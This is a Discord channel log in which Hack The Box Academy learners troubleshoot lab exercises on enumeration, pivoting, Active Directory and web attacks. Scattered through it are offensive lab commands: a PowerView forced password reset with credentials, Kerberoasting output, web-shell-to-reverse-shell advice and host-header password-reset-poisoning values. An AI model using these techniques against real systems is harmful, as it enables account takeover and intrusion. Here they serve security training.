#modules
I'm also assuming you downloaded the footprinting-wordlist.txt to run the command with
@green minnow what module and question is this on?
But increasing the wait time -W will yield results
As smtp is a generally slow service
So between 15-20 second wait time and you'll get it
This is advice that's been posted in the channel ad nauseam about that section
is wait time controlled by -w or -W because if it's -W then the walkthrough text is wrong.
The walkthrough is increasing worker processes
But that doesn't make it work better
-W is wait time
"the -w option, which sets the maximum number of seconds for waiting for replies:"
Ah
Unless I'm misremembering
You can do smtp-user-enum --help
To see the flags and stuff to use with it
I don't think there even is a -W or -w
With arguments: -m -u -U -s -S -r -t -M -f -D -p
-t n Wait a maximum of n seconds for reply (default: 5)
adding -t 20 doesn't actually change the Query timeout ............ 5 secs though
smtp-user-enum Usage Example
Use the VRFY method (-M VRFY) to search for the specified user (-u root) on the target server (-t 192.168.1.25):
root@kali:~# smtp-user-enum -M VRFY -u root -t 192.168.1.25
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
| ...
I am confused
Are you using the same version? Different version, different arguments...
smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) is version
Not sure if it's the same module, but for one of them I ended up using smtp_enum with metasploit and the provided wordlist. I remember smtp-user-enum not working so I just rolled to something else.
How can you have two -t options?
Yeah I just saw metasploit has a tool for this
good idea
But I've also had smtp-user-enum work, so like I said, not sure if it was a section issue, tool issue, or a layer 8 issue.
is smtp-user-enum.pl somehow different to smtp-user-enum even though they are both v1.2?
smtp-user-enum.pl is invoked with smtp-user-enum and is part of the pacman repo
so pentestmonkey just never fixed this?
learning to check check check everything hehe, the windows machine rdp'ed onto has an american keyboard so the @ symbol was giving me " when entering creds 😆
So I fixed it. You need to replace the contents of the script in /usr/bin/ with a fork where the issue is fixed https://github.com/pentestmonkey/smtp-user-enum/pull/2
Thing is this was fixed by this user in 2017. Why didn't pentestmonkey merge it?
Now the smtp-user-enum is working with -w set to 20 seconds.
Christ that took a lot of fixing. And it was apparently already fixed 7 years ago if the pull request was accepted!
Could it be that you are not using Kali or Parrot? It seems to be fixed in both distros.
I'm using Black Arch
I'm reaching out to the devs of black arch on github right now to tell them about this
I do wonder where Kali and Parrot are getting their version of smtp-user-enum though as the broken version is what's on pentestmonkey's github
And also confused as to why both versions have the same version number
No idea. Maybe it was fixed once and then added to the repos of the distros.
Likely a fix in their repos
I know parrot has the parrotsec gitlab
Is whoever pentestmonkey is just not active anymore? It's weird not to accept a pull request from 7 years ago that fixes the issue.
These things can happen with any software.
guys, i have a question. So how do i need to connect via ssh if i have permission denied
ssh sshuser@94.237.61.84 -p 22
The authenticity of host '94.237.61.84 (94.237.61.84)' can't be established.
ED25519 key fingerprint is SHA256:oXRFxErll+5X1LStJh/Fk8UDX7DQf4BhaHCGwGRAQYQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.61.84' (ED25519) to the list of known hosts.
sshuser@94.237.61.84: Permission denied (publickey).
ssh sshuser@94.237.61.84 -p 22
sshuser@94.237.61.84: Permission denied (publickey).
the password is qqww1122, but i cant connect
Use the port given from the target spawn.
If it’s a public ip, you’ll also receive a port
thx
Thanks discord for not loading this message before i typed
I was going through the windows fundamentals module, since it goes so deep I was wondering whether I need to memorise all of commands and stuff or just get an overview?
guys, sup again so
After successfully brute-forcing, and then logging into the target, what is the full flag you find?
so can someone give a hint whats a username
For what exactly?
For a theoretical test, practical exam, life, the academy modules?
Other than those proctored/monitored exams, there isn't any need to memorize anything
This has got to be the only way around slow target XRDP performance that I know of ― and it has the added benefit of all work being saved by default.
This is the Documentation & Reporting Practice Lab for context.
Alright I get it now. I should note it down though right?
What you find important, yes
It's always good to have the path you've taken and the commands you used
Stuck!
I'm on Module: getting started - Initial Foothold nibbles lab.
I've completed all the tasks (using the MSF module instead of the manual as I couldn't get the below to actually spawn a shell... frustrating!)
(see image 1 and 2)
There's just no connection coming back - am I missing anything?
Forgot to include this. Yes I did upload the shell 😄 no Curling it does not change the outcome.
Why don't you create a common web shell to pass system commands then you run the commands for a reverse shell as a GET request parameters?
That worked, thank you!
was more of a stickler and following exactly as the module intended to, but finding an alternative shell works just fine thanks
Hi
Active Directory Enumeration & Attacks > ACL Abuse Tactics
why i got this error, even i copied and pasted directly without changing the command, any help?
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> $SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
PS C:\Tools> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
PS C:\Tools> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\Tools> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Get-Domain] Error retrieving the current domain: Exception calling "GetCurrentDomain" with "0" argument(s): "Current security context is not associated with an Active Directory domain or forest."
WARNING: [Get-PrincipalContext] Error creating binding for object ('damundsen') context : Exception calling ".ctor" with "4" argument(s): "The server could not be contacted."
sounds like the domain controller isn't there, it thinks you aren't in a active directory environment
maybe reset the target and give it a few minutes to fully start all the services
9min not enough ?:(
Hey guys
I'm going insane
This hash is uncrackable
Idk what's wrong I've tried to modify it but hashcat never recognizes it
And I can't even paste it bc it's too long
Then it likely isn't the correct path.
This is intentional right?
Password Attacks - Network Services

I finished 3/4, stuck on this one.
whats the question
just finished the Web-Proxy Module, imo 100 cubes for this quick and easy Module is a bit much :/
Are you using the correct user?
yeah im having the same issue
i got the button enabled but I cant tell if I did it right?
I don't know the user, I'm reusing whatever users I got from brute forcing logins for other protocols. I found 2 more users from SSH but none of the passwords work for either user for RDP
So something to think about, if you have any access to a windows host, perhaps you could enumerate the information you need through some basic host based enumeration.
I'll be back
Ligolo isn't a web proxy tool
Oh mb wrong module...
did that but now burp is hanging on the target and im unsure how to set the cookie
Should be an option to "add prefix" to your payload
i did that
```http
POST /admin.php HTTP/1.1
Host: 94.237.54.240:56708
Content-Length: 21
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://94.237.54.240:56708
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.54.240:56708/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=21pddrkgvdampbnrn506jmevk5; cookie=4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359576f3d
Connection: keep-alive

user=admin&pass=admin
```
unsure what you mean by its "hanging" ¯\_(ツ)_/¯
The cookie feels off to me
its 88 characters I dont know what to tell you
¯\_(ツ)_/¯
I remember unencoding to get to 31 characters if memory and hint serves
Then in the payload options there's a section or button "add prefix"
I added the damn prefix
still nothing
The response is legit blank
nvm I had to reset the target we good
Sorry for being a little rude @fathom pendant
Hey guys, I’m having a little issue: as soon as I enable FoxyProxy and start BurpSuite, the webpage I’m trying to load won’t work anymore. Any idea why this might be happening?
Do you fix the certificate in the burp?
yeah i downloaded and installed it in the browser
but it should work by default, as its pre configured and installed by HTB
hmmm
I didnt really change anything, I start the browser, turn on foxy proxy and start burp suite. Max I can get is the GET request, but then the site won't load
have you tried just using the built in browser with burp
yeah
can you reach the site normally in a browser
I think I got it.
Is burp intruder turned on?
Or w/e it is that catches requests :3
this feels like a dumb question, but im on the FTP page in Footprinting and this FTP server seems basically nonfunctional
like, ls doesnt work lmao
well I tried dir just now and got a 200 PORT command successful, then it just hangs
ill reset and see if that changes anything
yeah, same thing
it's not a big deal, they might just be using some crappy FTP software, but I want to get this damn flag anyway
I also tried using the wget trick they show you to just grab all the files, but that also errored out
yeah the ls command hangs for like a minute then prints 425 Unable to build data connection: Connection timed out
just to be absolutely certain, you're connected to the vpn?
if you go ps -aux | grep openvpn, how many instances do you have running?
oh shit, there's three. didnt realize that could even happen
thats chill, sudo killall openvpn and restart the connection
actually it looks like openvpn just uses three processes? like I killed it, started it up again, checked and theres three again
IMAP sessions as far as I’ve had them aren’t straightforward like ls cd etc, if you do a search for IMAP cheat sheet on google you should get the commands you need @iron patio
yeah it pings
this might be an ignorant question but what does FTP have to do with IMAP?
the help command worked and it listed ls and dir as valid commands
np
maybe they just throttle the docker containers for these modules, so it's just too slow
that's my guess
How would you mitigate insecure deserialization with the pickle module?
For Nmap NSE module i am submitting the correct flag but it doesn't accept it
careful not to post spoilers of the content/flags. also if it's not accepting the flag then you didn't input it right or it isn't the right flag.
Does anyone know why someone might choose to use rpivot as opposed to dynamic port forwarding? Having some trouble wrapping my head around this
Can someone give hint about username , its hard to wait 60 hours
Login Brute Forcing
Skills Assessment Part 1
What is the password for the basic auth login?,
Doesn't this module include a list of usernames and passwords in resources?
I'm surprised then that none of them seem to be working for you
did u complete it?
Which module is this? I think a long time ago
Yo guys I have a question about linux privilege escalation. I am the Path Abuse section and I found the answer.
Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?
My question is:
Skills Assessment Part 1
Login Brute Forcing
Ah no I haven't completed this one, thought this might be the password attacks section
Think simple user
I just ran it for funsies using your screenshot and the wordlists recommended and it was successful.
HOWWWW
Just using the content from that section.
My question is...how is /games not the answer to this question. It is non-default
It fits the question.
You can shoot me a DM and I'll look at what you are running.
Pretty sure /usr/games & usr/local/games r default on parrot
Mm, ima check it out, it just seems illogical for games to be part of the PATH.
Got 3 more modules left, Windows priv esc, documentation and attacking enterprise networks.
Ok so obviously these do the same thing opposite ways but I was able to complete the rpivot section with ssh -D regardless
which module and section
or a general question
pivoting, Web Server Pivoting with Rpivot
Just not really understanding the practical use of reverse proxies in general ig
dm me
because maybe you can't bind a port, or you need to punch out from a firewall instead of punching through
Hello guys, I am stuck at the Shells & Payloads module with The Live Engagement at the following exercise:
**What language is the shell written in that gets uploaded when using the 50064.rb exploit?**
So I thought this would be easy since they posted about this 50064 exploit on the blog, so I tried to import it into msfconsole and run it. But it said:
[*] Got CSRF token:
[*] Logging into the blog...
[-] Login failed! Status code 404
[-] Exploit aborted due to failure: unexpected-reply: 172.16.1.12:80 - Authentication Failed
[*] Exploit completed, but no session was created.
Which is strange since I give it the right credentials (found at the desktop and in the hint)
So next I tried to manually exploit it so I looked at what the exploit was doing and found out it is uploading a php shell with a png header to a specific endpoint. I managed to upload a php reverse shell crafted with msfvenom and gave it a png header but when I then navigate to the directory where it should be stored, I won't get a shell back but just get the content of the payload as output.
Is there anyone who can help me with fixing the msfconsole or with fixing the payload to get interpreted correctly?
what did you mean by this
subdomains exist :)
I tried subdomain enum
try resetting the target, i'm also assuming you're running this from the target foothold
how did you try subdomain enum, remember this is a virtualhost so the http://FUZZ.domain.tld won't work
gobuster vhost -u http://inlanefreight.htb:34651 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
try adding --domain inlanefreight.htb
i'm assuming as well you added inlanefreight.htb to your hosts file
Alright I'll try resetting it. Yes I am running it from the target foothold
yup sure did
how did you add it?
ip inlanefreight.htb
?
yes
i didnt do that lel
Still getting the same error when trying to exploit with msfconsole 😭
I don't remember if this is necessary to exploit that host (I'm guessing it is) but you could likely look through the exploit and identify the language the shell is written in that way.
Yeah I got the answer that way hahaha but for the next one I need to get the flag on the host so I’ll need to get a shell
CLM bypass killing me
Like apparently it 'doesn't work' or something??
Paths are different because applocker
Hi?
why i can not go into the modules?
what do you mean?
Bump. Can anyone please help me with this?
idk reach out to support on the site or try using the links on the navigation pane on the left
hmm, that's weird
maybe disable add-ons
ill try thanks!
same issue i logged in using the private browser
You can DM me.
im not tripping am I? i found the path http://faculty.academy.htb:40654/courses/***-***.php7 that should be it in reference to the third question
I've already solved it. Thanks for offering to help tho.
Replace the number with PORT
Bruh
:)
I GOT IT RIGHT😭
This is almost as bad as the expert labs
can i complete all three job role paths? or i can only pursue and complete any one of them (with silver annual) ik its written still i am confused
You can complete all of them as long as your subscription is active
Thanks
sqlmap essentials - Tried using every --tamper in the list, using -r req.txt with request copied from burp (axxxxx.php POST with JSON parameter)
I added --random-agent, --chunked
used --batch and restricted the techniques to BEU to skip the positive answer of time-based
I clearly cannot understand what I am doing wrong 😑
any other advice? hints?
Why can't it bounce back?
Hello there, can anyone help me out with "Windows Attack & Defence" module?
Stuck at Print Spooler & NTLM Relaying section
Hi
I'm on Windows Privesc "Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user."
- cannot put anything on the "De^#!@ Sh@!#" access denied both on Pub and Priv (I'm logging in as htb-student via smbclient)
- putting links on FS01 didn't spark any interaction from the sccm_svc user
Any hint please?
Try diff region maybe pwnbox is bugged
hi for Initial Enumeration of the Domain under Active Directory Enumeration & Attacks, I can't seem to xfreerdp into the machine. I can only do that using -X parameter when i do ssh
ssh -X htb-student@10.129.125.159
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.51.131
The system becomes very laggy after this. I am getting an error 'ERROR][com.freerdp.client.x11] - failed to open display:' if i don't set -X
In the File inclusion module, in the skill assessment.
I don't have read access to /var/log/nginx/access.log, but a writeup online had read access to it.
how is this possible?
maybe they fixed an unintended way
no actually I was just going to say all I had to do is reset the machine and it worked.
it was giving me error 500 before.
ah okay, sometimes those machines are buggy
yep lol
I got the answer.
Might help someone save time 😉
```powershell
# Define the network share path
$sharePath = "\\Path\To\the share"

# Get all subfolders in the share (skip folders we cannot list instead of aborting)
$subfolders = Get-ChildItem -Path $sharePath -Directory -Recurse -ErrorAction SilentlyContinue

# Check each subfolder for write access
foreach ($folder in $subfolders) {
    $testFile = Join-Path -Path $folder.FullName -ChildPath "WriteTest.tmp"
    try {
        # Attempt to create a temporary file
        New-Item -Path $testFile -ItemType File -Force -ErrorAction Stop | Out-Null
        # If successful, output the writable folder
        Write-Host "Writable: $($folder.FullName)" -ForegroundColor Green
        # Clean up the test file
        Remove-Item -Path $testFile -Force -ErrorAction Stop
    } catch {
        # If an error occurs, it means the folder is not writable
        Write-Host "Not Writable: $($folder.FullName)" -ForegroundColor Red
    }
}
```
any updates on this?
After doing git clone https://gitlab.com/cryptsetup/cryptsetup.git How do I run it? There is no cryptsetup executable file, only the cryptsetup directory
Can someone DM me and explain 'dynamic front-end validation filters' in 'Code Review - Validation Logic Disparity' with screenshots of where to look for 'dynamic front-end validation filters'.
Read the docs/README
If I cancel htb academy subscription in the middle of a month. Will I get those days back after regaining the subscription (?)
the subscription will stay valid until you consume all the days of the month
I have 10 days left to be finished of monthly subscription. I will have to go somewhere urgent tomorrow. If I cancel my subscription & when I back after a couple of days, will I get the 10 days back (?)
It does not work like that
if you cancel your subscription, the current days will not stop being consumed
no you will still have access to the platform during this 10 days even if you cancel subscription now
ahhh, okay
in windows attack and defense kerberoasting the dictionary file 'passwords.txt' does not exist. I am stuck here
Hello everyone. I can't find this answers. This is File inclusion Submit the contents of the flag.txt file located in the /usr/share/flags directory.
Is it under the 'Resources' tab on HTB?
Hello there for skills assessment in sqlmap, I managed to obtain the flag but it has a typo?
yea like yknow the flags are formatted as HTB{} right? But for some reason the sqlmap returns something like QTB{} or HYB{}
yea
kinda weird tbh
i meant its not working* lol misread your message
folks anyone done the malicious document analysis can help me to get peepdf working
So I'm doing the Password Mutations section in the Password Attacks module. I'm using Hydra, but obviously SSH limits how many tasks can be performed. Is there a faster way or just suck up the wait time with Hydra, I know it's powerful and I tried netexec (crackmapexec) and msfconsole. However, they take just as long if not longer.
module: MSSQL, Exchange, and SCCM Attacks
section: Introduction to MSSQL Server
I cant connect to the sql server with the supplied creds.
I rdp into the machine as the "student" user, but then it is impossible to connect to the server
has anyone come across this?
Have you looked at the hint? And try using FTP instead of SSH.
What creds are you using for connecting to the RDBMS?
Iirc there is one for RDP and another for the MSSQL Server
someone can help me pls?
With what?
i can't find this: Submit the contents of the flag.txt file located in the /usr/share/flags directory
What module and section?
Section?
first
What’ve you tried? Dm me
thats an error because of the time based sql attack. In a time based sql attack the tool measures the time it took to execute a sql injection query to extract characters one by one. If your internet connection is a bit unstable the timing is off and it may accidentally detect the wrong character
hello, I'm in the "linux fundamentals" module and I got this question
Use CURL from your Pwnbox (not the target machine) to obtain the source code of the
"https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
i don't know how to answer it, no idea
Hi I've a problem with Dynamic Port Forwarding. I added Port 9050 to proxychains4.conf and connected to my target with ssh -D, basically like the module explains. However instead of getting:
ProxyChains-3.1 (http://proxychains.sf.net)
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 21 21:49:47 2022
==========================
| Target Information |
==========================
Target ........... 172.16.8.3
<SNIP>
I'm getting:
[proxychains] DLL init: proxychains-ng 4.17
ERROR: nmblookup is not in your path. Check that samba package is installed
ERROR: net is not in your path. Check that samba package is installed
ERROR: rpcclient is not in your path. Check that samba package is installed
ERROR: smbclient is not in your path. Check that samba package is installed
WARNING: polenum is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
For Gentoo, you need to install the "samba" package
For Debian, you need to install the "smbclient" package
I'm able to run enum4linux without proxychains
You need to use curl from the AttackBox or your own VM. Just type curl https://www.inlanefreight.com
I did and now it shows an html code in my terminal, what this has to do with the answer I'm not getting anything
That's the source code they are talking about. Now you just have to filter for the unique paths. My guess would be using grep. I'm sure HTB explains it in the section.
the weird thing is that htb really didn't explain it, so weird and now I'm lost and stuck in this
still stuck +2 more hours this morning, no email addy even. Last 3 Q's are killing me. Information Gathering - Web Edition final assessment.
DM me
install samba and smbclient packages
I already have, like I said enum4linux runs perfectly fine without proxychains
Hey guys I logged in today and found all my completed modules gone. Is there a way I can get these back???
Contact support
Need some help? Learn how to reach the support team on Academy.
Thnx!
🤞
I can't find the flag.txt file in File Inclusion. Can someone help me?
the SQLMAP Essentials module is so great
Anyone here done the "Password Reset Poisoning" from "Abusing HTTP Misconfigurations". Tried using all sorts of headers as you can see in the response of the intercept server:
Host: interactsh.local:40167
X-Forwarded-Server: interactsh.local:40167, interactsh.local
X-Forwarded-Host: interactsh.local:40167, interactsh.local:40167
X-Forwarded-For: interactsh.local:40167, 10.30.18.252
X-Host: interactsh.local:40167
However the password reset token is never given to me.
(edit: gotit)
Ok so I'm able to run proxychains together with curl, showmount and msfconsole. However if I try to run it with enum4linux I get this error message. This really confuses me. Anyone here who had the same issue or knows how to solve this?
Hello. I'm having a problem with the Windows Fundamentals first challenge. I've gotten the RDP connection to work and it's telling me to figure out the build number and windows version using the get-wmiobject, but no matter how I type it into Powershell, it keeps telling me it's not a valid command. I've tried several different combinations of typing this in and have not gotten anything involving Get-Wmiobject to be recognized.
I did not see a hint for the lab, I'll check again and try ftp instead.
that's PowerShell on Pwnbox. you need to RDP to the target machine and run the command on there
Well I thought I had it because the background changed to a windows background on the VM, but apparently not. At least when I opened my own computer's powershell the command worked so I know Im not going insane. I'll just have to try again when I have another VM token.
another window should appear with Windows in it if you RDP, you may have accidentally clicked off it
I very well might have. I'll just try again later. Thanks for the help!
You probably did rdp but still opened the pwnbox powershell instead
did anyone else find the foothold machine DEAD SLOW on pivoting skills assessment
keep having to reset the target because it completely freezes up
nah this is unusable 😦
Anyone has any hint for introduction to nosql injection skills assessment 2? Kind of stuck at the forget password page
Yeah it’s really slow
You could probably use nxc to execute commands remotely
Nvm I thought u meant the next machine but still applies
Is anyone else having some serious trouble answering these basic questions on the linux fundamentals? I am putting in what I think are the right answers but the right answers seem to be totally off. For example the very first question about the machine hardware name? x86_64 is apparently the right answer? In what world is that the name of the machine. The questions feel extremely misleading.
Nxc? That’s a new one for me
Same with answering the MTU question and the kernel. I'm still stuck on those even though I'm putting in exactly what it wants. MTU of 1500 is the tun0. But this isn't right? I even tried ens3 and still wrong. I'm pulling my hair out for these basic questions that I know the answer to but HTB says is wrong.
Ah netexec
I did exactly that. Still wrong.
Yep. I'm logged in.
For which question? I am having trouble with three of them. kernel version, MTU question, and mail question.
Kernel version is 6.5.0
Weird. I'll try I suppose. I only have one machine spawn a day though. Any insight for the MTU question? Pretty sure that was correct as well. And the mail question I just did echo $MAIL and that was wrong too.
I dunno. I don't want to give up on this but it's frustrating.
Was I on the wrong machine??
you have to be SSHed into the target machine
I do. Thank you so much. You've been patient and very helpful.
Hey can someone help with this, still running into the scenario where it works on my local machine, works on their vm but the flag wont generate
This has happened for both Static and CLM, the only sections I cant pass are the ones where they do a "check" to generate a flag
ls
Hey guys
Ad module - skill assessment part 2 - Q7
I can login to the sql server but it's not very useful.
When I try to use xp_cmdshell on other directories I always always get error 5 access denied
Also tried to create another user and give him xp_cmdshell permissions but I also get error 5.
When I tried to use revshell.com it says "write to the server failed"
I tried to use loads of different metasploit modules and not one connects back to give me a meterpreter, I tried this both while pivoting and without and it never connects back but I can login to the sql server with user n*****
Help, im trying to connect to a linux host from DCsync section, but i keep getting errors, this image is where i tried to directly rdp into that machine, the other time when i tried to ssh from windows i got faced with a permission denied error
I used printspoofer + nc
bruh so am i stuck for like forever?
can somone check please?
i rdped into the machine from Windows, but i got the same login screen with the same error, so i cant access both IPs, only 10.129.72.94 is accessible
is it normal to not be able to ping a htb's machine from pwnbox? I can't do it in the Windows fund module
you answered your own question on accident:)
Windows doesnt respond to pings by default
👍
reset target and try again
why? xd
ask in #starting-point
man ftp
Have the annual subscription and apparently my code isn't valid because I dont put the code into a try{} statement
Hey guys! I'm new here and to HTB, so I would like some advice on a few modules for the Penetration Testing path. I'm currently enrolled in the Penetration Testing path and going through the academy module layout I have seen a few modules that are "general". I have already completed the "Learning Process", "Linux Fundamentals", and "Windows Fundamentals". For the "Introduction To Network" I already know about networks so I skip over that one while I'm currently learning about web requests on my own before seeing it on HTB, but for "Introduction To Web Requests", "JavaScript Deobfuscation", and "Introduction Of Active Directory" I don't know much about. With all of that, I would like to know which I should do first before going deep into the Penetration Testing path.
Do whatever interests you the most
Okay, I will do that. Thanks for replying!
If your purpose is to complete the pentest path it will really depend on your current skill. The "Intro to AD" & "Intro to web requests" can be really useful if you don't know much about those things. I think that the "JS deobfuscation" module is less needed for this path
Those currently going through the AD Enum and/or WinLPE modules can thank me later for this: https://github.com/kennystrawnmusic/Evil-NtObjectManager
Thank you! I will take your advice.
@cerulean hinge , ability to help on this? #modules message
hey
when you use ssh -X you're asking a protocol that was designed for text and light file transfer to do this work of handling a full blown gui
and then you're surprised when it gets sluggish
yeah. Any solutions for this? Because without the X, it does not work. Is it possible for me to rdp to the windows machine without ssh to the first linux machine? I have heard of pivoting, not sure if that is the solution for this
i get the error when I xfreerdp..
thats the solution for this
a bit of guidance? what module do I need to do? The one on Pivoting and Forwarding? What tool can I use? Or maybe an article I can learn from quickly haha
yeah
one would think the pivoting and forwarding module was listed as a prerequisite
ok i will do that first. thanks for replying
Hello everyone. On the module 'File Transfers' section 'living off the land' the upload with certreq was impossible. Do you have tips for me? Have a nice day
you too
Yes
How did you bring the file on sql01?
Anyone else stuck on XSS: Phishing
I keep trying to put the payload in but it keeps throwing me invalid url
What tip u need
Like where u stuck
Hello
For the next 5 minutes I can help somebody who is doing cpts path
And is before the end of ad attack assessment
I am about to become the master
Each Time I tried I got an error like '-Post invalid parameter'
If you get an error when running certreq.exe, the version you are using may not contain the -Post parameter. You can download an updated version here and try again.
u need to update it
the here is in ur module
i remember having to update it
this is my problem, still stuck with it
ehe use grep and sort and stuff to filter out links
bro I'm too new to this
This is the regex version cos I can't type out the intended for the life of me can't remember it
curl https://www.inlanefreight.com > inlanefreight.txt && grep -Eo "https://www.inlanefreight.com[^'\"]*" inlanefreight.txt | sort -u | wc -l
and what does "unique paths" even mean
just means no duplicates
oh ok
study the command I sent
I prollyy did something wrong
it's almost correct ig
Can anyone assist me with Windows Attack and Defense? I am confused on the password.txt file with in the section Keberoast. I was able to move the file over from the windows machine using the SMB client. Closed the RDP and now I am lost.
curl https://www.inlanefreight.com | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l
Ironically this does count a duplicate twice and misses out one unique domain, but you get to the same answer
With xp_cmdshell
Come on hack the box, I get it, this is supposed to be learning and we are supposed to teach ourselves, but man, I gotta jump 10 sections to use the kali target just to finish the first section of Windows Attack and Defense. Come on man. 10 hours of wasted time and that's all I had to do. WOW just wow
──╼ $sudo proxychains GetUserSPNs.py -dc-ip 172.16.8.3 INLANEFREIGHT.LOCAL/mssqladm -request-user ttimmons
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies
Password:
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
acmetesting/LEGIT ttimmons 2022-06-01 13:32:18.194423 <never>
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.8.3:88 ... OK
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Hi guys, I am new around here so I am pleased to meet you all!
Nothing like that has been mentioned in the module neither has it been used before in the SOC Analyst path to my knowledge
are there any plans to update the crackmapexec module that's tier 3? seems as most probably know by now that the team moved under a different project due to hostile takeover issues in the repo
Anyways I don't understand why is this happening.. Is it a working as desired bug?
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos system
system: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos information
information: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos kernel
kernel: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos
apropos what?
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos apropos
apropos: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$ apropos ping
ping: nothing appropriate.
┌─[eu-academy-1]─[10.10.14.152]─[htb-ac-1514306@htb-rdr11sjo4r]─[~]
└──╼ [★]$
@storm elk
apropos system is working for me on my pwnbox
but i am on eu-academy-3 , let me switch to 1
Yeah I just ran sudo mandb then the command is working
It's not initialized by default?
So it was some sort of glitch?
could be
the lab setup is a bit weird. you're not supposed to SSH into Kali for some of the lab sections, including the first few
if the questions ask you to RDP into WS001, then you aren't meant to SSH to the Kali box
only when it asks you to RDP/SSH to Kali should you do so
in the module shells and payloads in the section infiltrating windows they are using a metasploit exploit windows/smb/ms17_010_psexec and we got the same machine for answering the questions . but when i am trying the same exploit it is not working
i tried windows/smb/ms17_010_eternalblue
too
i can use psexec to get the shell but it needs creds and they didn't give any ...
????
did you find the issue i'm in the same page
hello, why doesn't my ping {target_IP} work in the parrot terminal?
are u connected to the vpn
it is downloading the file how use their
once downloaded execute this command sudo openvpn <file-u-downloaded>
that has been downloaded in my computer how to send it in parrot os @empty trout
use python3 http.server to download that to your parrot
search online how to transfer a file with python http.server
dir
Can someone DM me and explain 'dynamic front-end validation filters' in ''Code Review - Validation Logic Disparity' with a screenshots where to look for 'dynamic front-end validation filters'.
Hello,
I'm stuck on question 2 of Intrusion Detection With Zeek in Working with IDS/IPS
I've used || tshark -r revilkaseya.pcap -q -z io,stat,0,"ip.src==A && ip.dst==B" with A the only ip I found in conversation in wireshark and B the given ip || but I can't get the right answer with that and I don't understand why... Could I discuss it with someone?
Pls I need help with this challenge on Linux commands. I was asked to find the config file that has been created after 2020-03-03 with size smaller than 28k and larger than 25k. I ran this command but got nothing on the terminal
find . -iname "*.config" -type f -newermt 2020-03-03 -size -28k -size +25k
I haven't done this module but config files on linux tend to be .conf
other than that, check that your current working directory is a good place to start, since you ran find .
What are the chances it's a bug from their site, cause similar command worked on my local machine
low, but you can always reset the machine
Cannot find path
No hashes loaded.
hey guys I am on the CPTS Footprinting Lab - Medium and I want to understand if we can use exploits here or that was not possible only for the EASY one. Thanks.. 🙂
I am still stuck in this module's pit. I wouldn't be able to answer the last three questions of the skills assessment if my life depended on it. I have easily invested 12 hours in that and I go over the module again, and the cheat sheet, and try everything and anything I can... fail. 😢 If someone is reading this who has gotten the last 3 questions, please DM me and give me a clue as to where to go because everything I tried has been a dead end. I totally found the email address too, but it's not the right one. Gaaaaaaaaaaaaaaaaaaaaaaaaaaaaaah!!!!!
Still same 😞
Even the next question after it, it asked to find the number of files with .bak extension
It returned 1 file but the answer seems incorrect 😩
Reread the question and redo the examples
I did the right way and it works thx ! However I'm not sure about why I didn't get it with tshark :/
I think the Lateral Movement section from Attacking Enterprise Networks is broken. I've tried to do a host discovery and all the hosts are up except 172.16.8.50. I need this host to use evil-winrm and move onto the next host. Can anyone verify that this problem exists? Is there someone that I can contact to fix this problem?
I didn't have any issues moving around
I suggest doing this module blind as well, since the module is the walkthrough.
